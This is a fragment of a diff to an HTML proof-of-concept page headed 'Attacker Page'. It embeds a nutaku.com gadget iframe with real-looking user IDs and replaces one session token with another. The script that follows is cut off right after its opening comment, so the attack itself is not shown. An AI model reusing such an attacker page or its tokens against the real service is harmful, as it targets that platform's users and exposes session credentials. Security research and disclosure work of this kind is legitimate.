--- a/63826187321312836671273721.html
+++ b/63826187321312836671273721.html
@@ -7,7 +7,7 @@
 <body>
   <h2>Attacker Page</h2>
 
-  <iframe id="victim" src="https://osapi.nutaku.com/gadgets/ifr?synd=nutaku&container=nutaku&country=US&lang=en&mid=1&owner=173250875&viewer=173250875&aid=267592&tid=demon-lords-career-change-x&view=canvas&parent=https%3A%2F%2Fwww.nutaku.net&noinfo=0&nocache=0&debug=1&view-params=&st=3w3rVTT6zCUb0jRYPMjmVyJuZrBq8tJ4Np0UsANkoB%2B5MYEWXpi6%2Bri4RcjmqRzCwXpkN3q46VPD%2BVLtSKl0xCmiFxpe6XICNNyWayl%2BnUh10gne4tMHXsMOkDMLPw7xCg9kr5ZxBODj5gbhoAjv6k%2FftWZ%2Bl698NA3r5n6%2FtN2wxRGcdIQUUVZPxUHIRjfOrYhAj%2Buq5rx7BFbgF1CedfxriMw1luiG4JyTV8wfR2x4XoptQFMpuz4tvimVW9dJrmJtCJIJDodfwFGppwDI14dkJiU%3D&domain=https%3A%2F%2Fwww.nutaku.net"></iframe>
+  <iframe id="victim" src="https://osapi.nutaku.com/gadgets/ifr?synd=nutaku&container=nutaku&country=US&lang=en&mid=1&owner=173250875&viewer=173250875&aid=267592&tid=demon-lords-career-change-x&view=canvas&parent=https%3A%2F%2Fwww.nutaku.net&noinfo=0&nocache=0&debug=1&view-params=&st=EJ%2BxQIaj4tkiQuuiA13R9jhW7OW%2BZFvAzd%2F6%2FbbiQOYxeqBydTBf2oo1UlDtHI7eFNBRvjTeVdqIoXrWBkjMEvxu8Itayn3QKadfjLMdn29hipJQdmaHjDTOZ0EJeE17G%2F8IZIsRLDVxFOVYEAp1HjXZPzldRIccd77NtStMnp7hT9rzzgfQdZ8Ad6GsFjsLOKgnuNVDkEDEILAtVTRClI40yUs3djwbHai1pUeRkKnsFydhVRVQo1MRvq6D0BBkk4GYR2Epr6ciatadu5XMcMS%2BN64%3D&domain=https%3A%2F%2Fwww.nutaku.net"></iframe>
 
   <script>
     // Wait until the iframe loads
